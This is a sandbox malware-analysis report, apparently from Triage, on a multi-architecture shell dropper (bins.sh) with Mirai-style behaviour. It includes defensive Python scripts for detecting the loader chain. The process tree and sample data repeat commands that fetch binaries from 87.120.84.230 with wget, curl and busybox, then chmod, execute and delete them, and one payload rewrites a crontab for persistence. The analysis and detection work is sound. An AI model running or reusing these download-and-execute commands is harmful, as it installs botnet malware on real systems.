Analysis
max time kernel: 22s
max time network: 75s
platform: debian-9_armhf
resource: debian9-armhf-20240611-en
resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 28-10-2024 06:53
Static task: static1
Behavioral task: behavioral1 (Sample: bins.sh, Resource: ubuntu1804-amd64-20240611-en)
Behavioral task: behavioral2 (Sample: bins.sh, Resource: debian9-armhf-20240611-en)
Behavioral task: behavioral3 (Sample: bins.sh, Resource: debian9-mipsbe-20240611-en)
Behavioral task: behavioral4 (Sample: bins.sh, Resource: debian9-mipsel-20240226-en)
The results below are from the debian9-armhf run (behavioral2); the same script was also queued on amd64, mipsbe and mipsel images, which matters because a multi-architecture dropper only produces follow-on behaviour on the image whose CPU matches one of its binaries.
General
Target: bins.sh
Size: 10KB
MD5: 2f7f72afe66995d80b8950bd71167bd4
SHA1: 289d4e79acdb59a5b7949b7efd0816c5642cad63
SHA256: a42b9535d1f64e52d6c1ab42f156b47099ba25c546a8d577c98f459e9b1ae32d
SHA512: 19333cd2736ae9ba80aae36f468e153cc75c2f02b5e10af97eadc06fe099ff9fde868882ff9617ab6ed27d4d79fea860f73a802781f99907704d74f78e4cc277
SSDEEP: 96:OXZ90n08OObaPWHgmGVTW8OObazgLmG93TpVVY6/IdNenUd:Op90n08OObaPWHgmGVHOObaXGdVqMnW
Malware Config
Signatures
-
File and Directory Permissions Modification    1 TTPs    12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes (pid, process):
683 chmod
711 chmod
742 chmod
767 chmod
787 chmod
794 chmod
801 chmod
810 chmod
817 chmod
832 chmod
838 chmod
844 chmod
Every hit is a `chmod 777 <dropped file>` on the binary just fetched into /tmp (see the process tree): one per payload, twelve payloads.
Executes dropped EXE    12 IoCs
Processes (path, pid, process):
/tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY    684    20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY
/tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h    713    OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h
/tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui    743    4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui
/tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z    768    kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z
/tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA    788    O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA
/tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie    795    uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie
/tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK    802    yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK
/tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG    811    3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG
/tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS    818    EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS
/tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv    833    4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv
/tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC    839    u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC
/tmp/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8    845    2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8
Of the twelve, only EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS (PID 818) shows any behaviour after launch (renames itself, sweeps /proc, installs a cron job); the other eleven exit without recorded activity. That is consistent with a multi-architecture dropper whose binaries are each built for a different CPU, with only one of them runnable on this armhf image.
Renames itself    1 IoCs
Processes (pid, process):
819    EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS
PID 819 is not the launch PID (818) of that binary; it is presumably a forked copy, which is the usual point at which a Mirai-style bot rewrites its own process name.
Creates/modifies Cron job    1 TTPs    1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes (description, ioc, process):
File opened for modification    /var/spool/cron/crontabs/tmp.FdDVRh    crontab
The tmp.XXXXXX name is the temporary file crontab(1) writes before renaming it over the user's crontab, so the IoC is the tool's side effect rather than a path the sample chose. The process tree shows the classic read-then-rewrite sequence: the dropped binary runs `sh -c "crontab -l"` to read the existing crontab and then `sh -c "crontab -"` to replace it from stdin. The content of the new crontab is not shown in this report.
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration    1 TTPs    12 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes (description, ioc, process):
File opened for reading    /proc/cpuinfo    curl    (12 reads, one per curl invocation)
Only the twelve `curl -O` downloads trigger this signature; none of the dropped binaries read /proc/cpuinfo. Together with the /proc/self/auxv and /proc/sys/crypto/fips_enabled reads attributed to curl below, this is consistent with curl's TLS library probing CPU features and FIPS mode at start-up, so treat the hit as tooling noise rather than as sandbox evasion by the sample.
Reads runtime system information
Processes (description, ioc, process):
File opened for reading    /proc/<pid>/cmdline    EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS
    for pid in 1, 4, 6, 9, 12, 13, 14, 15, 16, 17, 18, 19, 20, 22, 23, 24, 25, 26, 28, 41, 42, 43, 76, 97, 106, 141, 169, 196, 216, 269, 315, 583, 599, 604, 641, 647, 770, 809, 824, 826, 827, 828, 835, 836, 837, 841, 842, 843 (48 reads)
File opened for reading    /proc/sys/crypto/fips_enabled    curl    (7 reads)
File opened for reading    /proc/self/auxv    curl    (7 reads)
File opened for reading    /proc/filesystems    crontab    (2 reads)
The dropped binary walks the command line of every process on the box, including kernel threads and the script's own later wget/curl/chmod children (PIDs 824 to 843), which shows it kept running in the background while bins.sh moved on to the next payload. A sweep over /proc/<pid>/cmdline is the pattern Mirai-family bots use to find and kill competing bots; the curl and crontab reads in the same list are library and utility start-up behaviour and carry no such signal.
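The distinction drawn above, between a process probing /proc for its own configuration and a process sweeping every other process's command line, is easy to lose when a sandbox lumps both under one signature. The following script is an added example, not part of the Triage report or of any tooling the report describes: it replays "path process" events of the shape listed in this section (the sample lines are constructed from the report's IoCs, truncated) and flags a process as enumerating others only once it has read the cmdline of a threshold number of distinct foreign PIDs. The benign-path list and the threshold of five are assumptions to tune for your own environment.

```python
"""Triage /proc reads from a sandbox 'file opened for reading' log.

Added example, not part of the Triage report. Separates reads that
ordinary tooling performs at start-up (CPU-feature and FIPS probes by
curl's TLS library, /proc/filesystems by crontab) from a sweep over
/proc/<pid>/cmdline, which is what a process-enumerating implant does.
"""
import re
from collections import defaultdict

# Constructed sample in the report's "<path> <process>" shape (truncated).
EVENTS = """\
/proc/cpuinfo curl
/proc/sys/crypto/fips_enabled curl
/proc/self/auxv curl
/proc/filesystems crontab
/proc/1/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS
/proc/4/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS
/proc/9/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS
/proc/641/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS
/proc/836/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS
/proc/843/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS
/proc/cpuinfo curl
"""

# Paths a process reads about *itself* or the host's configuration.
# Assumption: list drawn from this report; extend it for your own tooling.
BENIGN_SELF_PROBES = {
    "/proc/cpuinfo",                 # CPU feature detection by crypto libs
    "/proc/self/auxv",               # ELF auxiliary vector (hwcap flags)
    "/proc/sys/crypto/fips_enabled", # FIPS-mode check by TLS libraries
    "/proc/filesystems",             # crontab checking available fs types
}

PID_CMDLINE = re.compile(r"^/proc/(\d+)/cmdline$")


def parse_events(text):
    """Yield (path, process) tuples from 'path process' lines."""
    for line in text.splitlines():
        line = line.strip()
        if line:
            path, _, proc = line.rpartition(" ")
            yield path, proc


def triage(text, sweep_threshold=5):
    """Per process: count self-probes, collect foreign PIDs whose cmdline
    was read, keep any other path, and decide whether it is a sweep."""
    per_proc = defaultdict(
        lambda: {"self_probes": 0, "foreign_pids": set(), "other": []})
    for path, proc in parse_events(text):
        rec = per_proc[proc]
        m = PID_CMDLINE.match(path)
        if m:
            rec["foreign_pids"].add(int(m.group(1)))
        elif path in BENIGN_SELF_PROBES:
            rec["self_probes"] += 1
        else:
            rec["other"].append(path)
    for rec in per_proc.values():
        # Assumption: reading >= threshold distinct PIDs' cmdline is a sweep.
        rec["enumerates_processes"] = len(rec["foreign_pids"]) >= sweep_threshold
    return dict(per_proc)


if __name__ == "__main__":
    for proc, rec in triage(EVENTS).items():
        verdict = "PROCESS SWEEP" if rec["enumerates_processes"] else "self-probe only"
        print(f"{proc:36} self_probes={rec['self_probes']} "
              f"pids={len(rec['foreign_pids'])}  -> {verdict}")
```

Feeding it the full IoC list from this section gives curl and crontab a verdict of "self-probe only" and the dropped binary a sweep over 48 PIDs; the point of keying on distinct foreign PIDs rather than on "reads /proc" is that the same rule stays quiet on ordinary curl traffic.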
Writes file to tmp directory    30 IoCs
Malware often drops required files in the /tmp directory.
Processes (description, ioc, process), grouped by dropped file:
File opened for modification    /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY    wget, curl, busybox
File opened for modification    /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h    wget, curl, busybox
File opened for modification    /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui    wget, curl, busybox
File opened for modification    /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z    wget, curl, busybox
File opened for modification    /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA    wget, curl, busybox
File opened for modification    /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie    wget, curl, busybox
File opened for modification    /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK    wget, curl, busybox
File opened for modification    /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG    wget, curl, busybox
File opened for modification    /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS    wget, curl, busybox
File opened for modification    /tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv    busybox
File opened for modification    /tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC    busybox
File opened for modification    /tmp/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8    busybox
The script tries three downloaders for each payload (wget, curl -O, busybox wget) so that it works on stripped-down devices that only ship one of them; on a full Debian image all three succeed and overwrite the same file. For the last three payloads only the busybox fetch wrote a file, so whichever copy was executed came from that fetch.
Processes
Indentation gives the depth in the process tree; bracketed lines are the signatures each process triggered.

PID 649  /tmp/bins.sh  /tmp/bins.sh
  PID 651  /bin/rm  rm bins.sh
  PID 653  /usr/bin/wget  wget http://87.120.84.230/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY
           [Writes file to tmp directory]
  PID 676  /usr/bin/curl  curl -O http://87.120.84.230/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY
           [Checks CPU configuration] [Writes file to tmp directory]
  PID 682  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY
           [Writes file to tmp directory]
  PID 683  /bin/chmod  chmod 777 20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY
           [File and Directory Permissions Modification]
  PID 684  /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY  ./20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY
           [Executes dropped EXE]
  PID 686  /bin/rm  rm 20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY
  PID 687  /usr/bin/wget  wget http://87.120.84.230/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h
           [Writes file to tmp directory]
  PID 694  /usr/bin/curl  curl -O http://87.120.84.230/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h
           [Checks CPU configuration] [Reads runtime system information] [Writes file to tmp directory]
  PID 706  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h
           [Writes file to tmp directory]
  PID 711  /bin/chmod  chmod 777 OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h
           [File and Directory Permissions Modification]
  PID 713  /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h  ./OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h
           [Executes dropped EXE]
  PID 715  /bin/rm  rm OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h
  PID 716  /usr/bin/wget  wget http://87.120.84.230/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui
           [Writes file to tmp directory]
  PID 729  /usr/bin/curl  curl -O http://87.120.84.230/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui
           [Checks CPU configuration] [Reads runtime system information] [Writes file to tmp directory]
  PID 739  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui
           [Writes file to tmp directory]
  PID 742  /bin/chmod  chmod 777 4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui
           [File and Directory Permissions Modification]
  PID 743  /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui  ./4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui
           [Executes dropped EXE]
  PID 745  /bin/rm  rm 4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui
  PID 746  /usr/bin/wget  wget http://87.120.84.230/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z
           [Writes file to tmp directory]
  PID 749  /usr/bin/curl  curl -O http://87.120.84.230/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z
           [Checks CPU configuration] [Reads runtime system information] [Writes file to tmp directory]
  PID 762  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z
           [Writes file to tmp directory]
  PID 767  /bin/chmod  chmod 777 kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z
           [File and Directory Permissions Modification]
  PID 768  /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z  ./kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z
           [Executes dropped EXE]
  PID 772  /bin/rm  rm kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z
  PID 774  /usr/bin/wget  wget http://87.120.84.230/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA
           [Writes file to tmp directory]
  PID 785  /usr/bin/curl  curl -O http://87.120.84.230/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA
           [Checks CPU configuration] [Reads runtime system information] [Writes file to tmp directory]
  PID 786  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA
           [Writes file to tmp directory]
  PID 787  /bin/chmod  chmod 777 O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA
           [File and Directory Permissions Modification]
  PID 788  /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA  ./O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA
           [Executes dropped EXE]
  PID 790  /bin/rm  rm O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA
  PID 791  /usr/bin/wget  wget http://87.120.84.230/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie
           [Writes file to tmp directory]
  PID 792  /usr/bin/curl  curl -O http://87.120.84.230/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie
           [Checks CPU configuration] [Reads runtime system information] [Writes file to tmp directory]
  PID 793  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie
           [Writes file to tmp directory]
  PID 794  /bin/chmod  chmod 777 uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie
           [File and Directory Permissions Modification]
  PID 795  /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie  ./uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie
           [Executes dropped EXE]
  PID 797  /bin/rm  rm uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie
  PID 798  /usr/bin/wget  wget http://87.120.84.230/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK
           [Writes file to tmp directory]
  PID 799  /usr/bin/curl  curl -O http://87.120.84.230/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK
           [Checks CPU configuration] [Writes file to tmp directory]
  PID 800  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK
           [Writes file to tmp directory]
  PID 801  /bin/chmod  chmod 777 yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK
           [File and Directory Permissions Modification]
  PID 802  /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK  ./yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK
           [Executes dropped EXE]
  PID 804  /bin/rm  rm yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK
  PID 805  /usr/bin/wget  wget http://87.120.84.230/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG
           [Writes file to tmp directory]
  PID 806  /usr/bin/curl  curl -O http://87.120.84.230/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG
           [Checks CPU configuration] [Reads runtime system information] [Writes file to tmp directory]
  PID 807  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG
           [Writes file to tmp directory]
  PID 810  /bin/chmod  chmod 777 3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG
           [File and Directory Permissions Modification]
  PID 811  /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG  ./3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG
           [Executes dropped EXE]
  PID 813  /bin/rm  rm 3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG
  PID 814  /usr/bin/wget  wget http://87.120.84.230/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS
           [Writes file to tmp directory]
  PID 815  /usr/bin/curl  curl -O http://87.120.84.230/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS
           [Checks CPU configuration] [Reads runtime system information] [Writes file to tmp directory]
  PID 816  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS
           [Writes file to tmp directory]
  PID 817  /bin/chmod  chmod 777 EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS
           [File and Directory Permissions Modification]
  PID 818  /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS  ./EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS
           [Executes dropped EXE] [Renames itself] [Reads runtime system information]
    PID 820  /bin/sh  sh -c "crontab -l"
      PID 821  /usr/bin/crontab  crontab -l
               [Reads runtime system information]
    PID 822  /bin/sh  sh -c "crontab -"
      PID 823  /usr/bin/crontab  crontab -
               [Creates/modifies Cron job] [Reads runtime system information]
  PID 825  /bin/rm  rm EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS
  PID 828  /usr/bin/wget  wget http://87.120.84.230/bins/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv
  PID 830  /usr/bin/curl  curl -O http://87.120.84.230/bins/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv
           [Checks CPU configuration]
  PID 831  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv
           [Writes file to tmp directory]
  PID 832  /bin/chmod  chmod 777 4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv
           [File and Directory Permissions Modification]
  PID 833  /tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv  ./4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv
           [Executes dropped EXE]
  PID 834  /bin/rm  rm 4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv
  PID 835  /usr/bin/wget  wget http://87.120.84.230/bins/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC
  PID 836  /usr/bin/curl  curl -O http://87.120.84.230/bins/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC
           [Checks CPU configuration] [Reads runtime system information]
  PID 837  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC
           [Writes file to tmp directory]
  PID 838  /bin/chmod  chmod 777 u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC
           [File and Directory Permissions Modification]
  PID 839  /tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC  ./u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC
           [Executes dropped EXE]
  PID 840  /bin/rm  rm u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC
  PID 841  /usr/bin/wget  wget http://87.120.84.230/bins/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8
  PID 842  /usr/bin/curl  curl -O http://87.120.84.230/bins/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8
           [Checks CPU configuration] [Reads runtime system information]
  PID 843  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8
           [Writes file to tmp directory]
  PID 844  /bin/chmod  chmod 777 2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8
           [File and Directory Permissions Modification]
  PID 845  /tmp/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8  ./2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8
           [Executes dropped EXE]
  PID 846  /bin/rm  rm 2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8
  PID 847  /usr/bin/wget  wget http://87.120.84.230/bins/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF

The recorded trace ends at the request for a thirteenth payload (HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF); no curl or busybox fetch, chmod, execution or removal of it appears. Every iteration follows the same fetch, chmod 777, execute, rm loop against a single plaintext HTTP host, 87.120.84.230, which is the one network indicator this report exposes.
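The tree above is twelve repetitions of one loop, and that regularity is what a detection should key on: a file name that is fetched by a downloader, chmod'ed, executed from /tmp and then deleted, all by the same parent, plus a dropped binary that ends up behind a `crontab -`. The script below is an added example and is not part of the Triage report or of any product it describes. It replays process-execution events of the shape shown in the tree (pid, parent pid, executable, command line; the sample list is constructed from the report and truncated to two payloads plus the trailing fetch), reconstructs the per-file stage set, collects the payload URLs, and attributes any `crontab -` to the nearest non-shell ancestor. The event tuple layout and the downloader names are assumptions about your own telemetry.

```python
"""Reconstruct the dropper's fetch -> chmod -> execute -> delete chain.

Added example, not part of the Triage report. Replays process-execution
events, tracks which stages each dropped file name went through, collects
payload URLs and attributes crontab writes to the binary behind them.
"""
import re
import shlex
from collections import defaultdict

# Constructed sample: (pid, parent_pid, executable, command line),
# copied from the report's process tree and truncated to two payloads.
HOST = "http://87.120.84.230/bins/"
EXEC_EVENTS = [
    (649, 1,   "/tmp/bins.sh",     "/tmp/bins.sh"),
    (651, 649, "/bin/rm",          "rm bins.sh"),
    (653, 649, "/usr/bin/wget",    "wget " + HOST + "20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY"),
    (676, 649, "/usr/bin/curl",    "curl -O " + HOST + "20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY"),
    (682, 649, "/bin/busybox",     "/bin/busybox wget " + HOST + "20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY"),
    (683, 649, "/bin/chmod",       "chmod 777 20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY"),
    (684, 649, "/tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY", "./20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY"),
    (686, 649, "/bin/rm",          "rm 20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY"),
    (814, 649, "/usr/bin/wget",    "wget " + HOST + "EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS"),
    (817, 649, "/bin/chmod",       "chmod 777 EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS"),
    (818, 649, "/tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS", "./EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS"),
    (820, 818, "/bin/sh",          'sh -c "crontab -l"'),
    (821, 820, "/usr/bin/crontab", "crontab -l"),
    (822, 818, "/bin/sh",          'sh -c "crontab -"'),
    (823, 822, "/usr/bin/crontab", "crontab -"),
    (825, 649, "/bin/rm",          "rm EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS"),
    (847, 649, "/usr/bin/wget",    "wget " + HOST + "HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF"),
]

FETCHERS = {"wget", "curl"}          # assumption: downloaders to watch for
URL_RE = re.compile(r"^https?://\S+$")
FULL_CHAIN = {"fetch", "chmod", "exec", "rm"}


def basename(path):
    return path.rsplit("/", 1)[-1]


def analyse(events):
    """Return (chains, urls, cron_writers).

    chains: {file name: set of stages seen among fetch/chmod/exec/rm}
    urls:   distinct payload URLs in first-seen order
    cron_writers: executables of the non-shell ancestors of `crontab -`
    """
    chains = defaultdict(set)
    urls = []
    parent_of, exe_of = {}, {}
    cron_writers = set()
    for pid, ppid, exe, cmdline in events:
        parent_of[pid], exe_of[pid] = ppid, exe
        argv = shlex.split(cmdline)
        tool = basename(argv[0])
        if tool == "busybox" and len(argv) > 1:   # busybox applet: "busybox wget ..."
            argv = argv[1:]
            tool = argv[0]
        if tool in FETCHERS:
            for url in (a for a in argv if URL_RE.match(a)):
                if url not in urls:
                    urls.append(url)
                chains[basename(url)].add("fetch")
        elif tool == "chmod" and len(argv) == 3:
            chains[basename(argv[2])].add("chmod")
        elif tool == "rm" and len(argv) == 2:
            chains[basename(argv[1])].add("rm")
        elif tool == "crontab" and argv[1:] == ["-"]:
            # Skip the "sh -c" wrappers to find the process that installed the job.
            p = ppid
            while p in exe_of and basename(exe_of[p]) == "sh":
                p = parent_of[p]
            if p in exe_of:
                cron_writers.add(exe_of[p])
        elif exe.startswith("/tmp/"):                # assumption: /tmp is the drop dir
            chains[basename(exe)].add("exec")
    return dict(chains), urls, cron_writers


def complete_chains(chains):
    """File names that went through every stage of the loader loop."""
    return sorted(name for name, stages in chains.items() if FULL_CHAIN <= stages)


if __name__ == "__main__":
    chains, urls, cron = analyse(EXEC_EVENTS)
    print("full fetch/chmod/exec/rm chains:", complete_chains(chains))
    print("payload URLs:", *urls, sep="\n  ")
    print("binaries that rewrote a crontab:", cron)
```

On the constructed sample the two executed payloads come back as complete chains, the trailing HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF fetch stays at the "fetch" stage, and the crontab rewrite is attributed to /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS rather than to /bin/sh. Deduplicating URLs matters because the script issues the same URL through three downloaders; counting them separately would triple the indicator list.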
Network
MITRE ATT&CK Enterprise v15
Downloads

1. Filesize: 129KB
MD5: 54bec959d900ad930dc662f8092da57d
SHA1: 9ae7ad9018eeac5aa89bcde68ec683a364ac7d55
SHA256: b62a7cb65dda1cb1ae995b13b62d20289f43b7bc560211484cfdc98c0d9b5f12
SHA512: 904a52a1d41d442da07333f9835bb0b1bfcefe9790a566d3b8e03d62e0c788d10b0e17b05865798b1817615b3adb07adfcb13452d96aacf5995b66fae617db40

2. Filesize: 108KB
MD5: c97a9c55ddb153e8bfce38f201d2cffb
SHA1: 3970452f27327f98c2e3fdcabf0390067b48bd62
SHA256: 138a80e023ab0bbb8b2259cf3633c94c39e6f68df2be2ad01ef08590249e662c
SHA512: 1734a2e256f90d99d73c70d0faa5b3d24d39a2e9a60dec0c138e75ae0e1793edafb408e1f2aaa2692f40265183faea1d4141b271fb67543633a412817f9fd11e

3. Filesize: 129KB
MD5: 52f72bcf31899453b40d37a7cbf55f35
SHA1: 6dfca1bd70aad3e88713b02ec1669ba5a792456c
SHA256: ed7e61403d47c0319eea05db0cba4d17bfb1594621d6722bfe43cffecacdf495
SHA512: be8b5d14afe30f1ce2f474a20af599a93c3a7543ec301554dd2ffa0225c945d91c3354d777f09ee886a90acfa8ecfa24533de9cf3bcf5f59a44d53ca3c73e967

4. Filesize: 88KB
MD5: e9e5d79acad49bbe6c77df0385ec77aa
SHA1: 53bbc8b58873cf3117743fab15bd5508421370eb
SHA256: a585eff62bec554d3d7f23aaf9b298a15eb328e8968352339db915ef427f27bd
SHA512: 828680ef393890f3c8805527a473f018b212fa1d6c8534fc03bb34f910de4b8d1cd5ce3cef2c06396f225a61794205a61d9fdc6847b14ebd6d7267af9f38f381

5. Filesize: 122KB
MD5: aadb8cc4b6eac7fce760c09262693884
SHA1: b55178ff3605f4bbfc9286d4c8ac445673232217
SHA256: b254f9a6df1e7aae5181abf014b9d574c959ab71bdfd3a2b21022446c583d843
